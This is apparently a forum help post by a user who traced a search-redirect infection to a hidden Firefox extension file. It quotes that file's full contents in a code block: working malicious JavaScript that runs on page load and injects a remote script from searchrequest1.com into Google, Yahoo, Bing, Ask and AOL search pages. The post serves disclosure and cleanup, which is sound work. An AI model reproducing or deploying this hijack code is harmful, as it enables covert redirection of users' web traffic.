Google redirect issue - waitforclick.com/searchrequest1.com - possible solution

Lately, I ran into an issue where search results on Google were redirected to other sites, including waitforclick.com. I could find nothing infecting my system using HijackThis, Malwarebytes, or any other number of tools.

After tearing my system apart in fury, I discovered the following regarding the issue.

In the C:\Program Files (x86)\Mozilla Firefox\extensions\{9CE11043-9A15-4207-A565-0C94C42D590D}\chrome\content directory, I found a file called timer.xul which was responsible for the redirect.

Here are the contents of the file:

Code:

<?xml version="1.0" encoding="UTF-8"?>
<overlay id="xulcache-overlay"
  xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">

<script type="application/x-javascript" >
function Insert() { var headID = content.document.getElementsByTagName("head")[0]; var newScript = content.document.createElement("script");
newScript.type = "text/javascript"; newScript.src = "http://searchrequest1.com/request.php?aid=5nip3r"; headID.appendChild(newScript);}
function URL() {var url=content.document.location.href; if(url.indexOf("googlesearchserver") == -1 ) { if(url.indexOf("search") != -1 ) {
if(url.indexOf("google.com") != -1) { Insert(); } if(url.indexOf("yahoo.com") != -1)  { Insert(); } if(url.indexOf("bing.com") != -1)
{Insert();} if(url.indexOf("ask.com") != -1) { Insert(); } if(url.indexOf("aol.com/aol/search?s_it") != -1){Insert();}}}}
window.addEventListener("load", init, false); function init() { var appcontent = document.getElementById("appcontent");
if(appcontent) { appcontent.addEventListener("DOMContentLoaded", onPageLoad, true); }} function onPageLoad(aEvent) { URL();}

</script>
</overlay>

Apprently, it's loading Javascript into the search results of popular search engines, which redirects the results to the search sites.

This bit of pain seems to have been installed by another piece of malware, which I had removed weeks ago. However, this component was invisible on all scans.

Starting Firefox in safemode prevented the Google results from being redirected, however, in the Firefox GUI, I did not see an extension that was linked to this file, so I am still uncertain as to how it was loading.

Unfortunately, I sorta tore my installation of Firefox apart locating what was causing this redirect, and cannot confirm (but highly suspect) that simply deleting this file would resolve this issue. After reinstalling Firefox, I no longer experience this redirect.

Hope this information helps.